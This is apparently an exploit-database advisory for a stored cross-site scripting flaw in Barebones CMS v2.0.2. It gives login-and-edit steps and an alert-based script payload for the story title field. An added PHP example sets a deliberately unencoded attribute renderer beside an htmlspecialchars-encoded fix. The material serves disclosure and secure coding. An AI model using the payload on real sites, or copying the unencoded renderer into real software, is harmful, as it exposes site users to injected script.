Exploits / Vulnerability Discovered: 2023-06-04
Type: webapps
Platform: php
This exploit / vulnerability, Barebones CMS v2.0.2 stored cross-site scripting (XSS) (authenticated), is for educational purposes only; if you use it, you do so at your own risk!
1) Log in to the admin panel and go to new story:
https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540
2) Click the edit button and enter your payload in the title field:
Payload: "><script>alert(1)</script>
3) After saving the change, you will see the alert.
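
The leading `">` in the title payload suggests the stored title is written back into a quoted HTML attribute without encoding. The following is an added example, not code from the original write-up or from Barebones CMS, showing that pattern beside an output-encoded version. The attribute context, the function names `render_title_field_unsafe`, `render_title_field_safe` and `inspect_fragment`, and the `<input>` markup are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; not Barebones CMS source code.

// Vulnerable pattern: the stored title is concatenated into the attribute as-is.
function render_title_field_unsafe(string $title): string
{
    return '<input type="text" name="title" value="' . $title . '">';
}

// Hardened: encode for the HTML attribute context at output time.
// ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid
// UTF-8 sequences instead of returning an empty string.
function render_title_field_safe(string $title): string
{
    $encoded = htmlspecialchars($title, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="title" value="' . $encoded . '">';
}

// Parse the fragment the way an HTML parser would and report how many
// <script> elements it produced and what value the input actually carries.
function inspect_fragment(string $html): array
{
    libxml_use_internal_errors(true); // tolerate the malformed markup
    $doc = new DOMDocument();
    $doc->loadHTML('<?xml encoding="UTF-8"><body>' . $html . '</body>');
    libxml_clear_errors();
    $input = $doc->getElementsByTagName('input')->item(0);
    return [
        'script_elements' => $doc->getElementsByTagName('script')->length,
        'input_value'     => $input ? $input->getAttribute('value') : null,
    ];
}

// Title payload from step 2 of the write-up.
$title = '"><script>alert(1)</script>';

$renderers = ['unsafe' => 'render_title_field_unsafe', 'safe' => 'render_title_field_safe'];
foreach ($renderers as $label => $fn) {
    $info = inspect_fragment($fn($title));
    printf("%-6s script elements: %d, input value: %s\n",
        $label, $info['script_elements'], var_export($info['input_value'], true));
}
```

Because the encoding is applied when the value is written into the page, titles that were already stored with markup in them are rendered inert as well.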